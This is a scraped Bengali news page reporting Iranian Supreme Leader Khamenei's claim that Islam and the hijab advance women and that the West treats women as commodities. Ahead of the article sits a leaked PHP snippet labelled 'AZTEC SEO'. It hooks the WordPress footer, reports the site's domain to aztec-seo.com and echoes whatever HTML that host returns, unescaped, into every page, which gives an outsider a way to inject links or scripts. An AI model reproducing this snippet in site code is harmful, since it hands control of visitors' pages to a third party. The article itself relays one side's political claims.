/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইসলাম ও হিজাব যে নারী উন্নয়নের সহায়ক তার প্রমাণ ইসলামী ইরান: সর্বোচ্চ নেতা | Dhaka Sky News

দাঙ্গাবাজ, লুটেরাবাজ বিজেপি’র কোনও ঠাঁই নেই: মমতা বন্দ্যোপাধ্যায়

আগের সংবাদ

আমেরিকার মোকাবেলায় ইরান আরেকবার বিজয়ী হলো: প্রেসিডেন্ট রুহানি

পরের সংবাদ

ইসলাম ও হিজাব যে নারী উন্নয়নের সহায়ক তার প্রমাণ ইসলামী ইরান: সর্বোচ্চ নেতা

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 3, 2021 , 10:36 pm

ইসলামী প্রজাতন্ত্র ইরানের সর্বোচ্চ নেতা আয়াতুল্লাহিল উজমা খামেনেয়ী বলেছেন, ইসলামী ইরান নারীর প্রতি সম্মান ও মর্যাদা প্রদর্শনে বিশ্বাসী। কিন্তু পাশ্চাত্য নারীকে পণ্য ও উপকরণ হিসেবে দেখে। নারীদের বিষয়ে ইসলাম ধর্ম ও পাশ্চাত্যের দৃষ্টিভঙ্গিতে এখানেই পার্থক্য।

তিনি আজ (বুধবার) আহলে বাইত (আ.)’র শোকগাথা পাঠকারীদের এক সমাবেশে ভিডিও কনফারেন্সের মাধ্যমে যুক্ত হয়ে এসব কথা বলেন। তিনি এ সময় নবী নন্দিনী হজরত ফাতিমা (সা.আ.)’র জন্মবার্ষিকী উপলক্ষে সবাইকে শুভেচ্ছা জানান। ইরানে নবী নন্দিনীর জন্মবার্ষিকী নারী ও মা দিবস হিসেবে পালিত হয়।

ইরানের সর্বোচ্চ নেতা আরও বলেন, ইসলাম ধর্মে ঐশী ও মানবীয় মূল্যবোধের দিক থেকে নারী ও পুরুষের মধ্যে কোনো তফাৎ নেই। অভিন্ন দায়িত্বের পাশাপাশি নারী ও পুরুষের বিশেষ দায়িত্বও রয়েছে। এ কারণে মহান আল্লাহ যার যার দায়িত্বের সঙ্গে সামঞ্জস্য রেখে শারীরিক গঠন কাঠামো দিয়েছেন।

ইরানের সর্বোচ্চ নেতা বলেন, ইসলামের দৃষ্টিভঙ্গি আমাদের জন্য গর্বের বিষয়। আমরা নারী ও জীবন প্রণালীর বিষয়ে পাশ্চাত্যের দৃষ্টিভঙ্গির ঘোর বিরোধী।

ভিডিও কনফারেন্স

তিনি বলেন, পাশ্চাত্য দাবি করে ইসলাম ও ইসলামী হিজাব নারীর উন্নয়ন ও বিকাশে বাধা সৃষ্টি করে। কিন্তু একেবারে স্পষ্ট মিথ্যাচার। তারা যে ঠিক বলছে না তার প্রমাণ হলো ইসলামী প্রজাতন্ত্র ইরানে নারীদের অবস্থা। ইতিহাসের কোনো পর্যায়েই ইরানে এত বেশি শিক্ষিত এবং সামাজিক, সাংস্কৃতিক, শিল্প, বিজ্ঞান, রাজনৈতিক ও অর্থনৈতিক অঙ্গনে কর্মতৎপর নারী ছিল না। এসবই হয়েছে ইসলামী প্রজাতন্ত্রের কল্যাণে। সূত্র : পার্সটুডে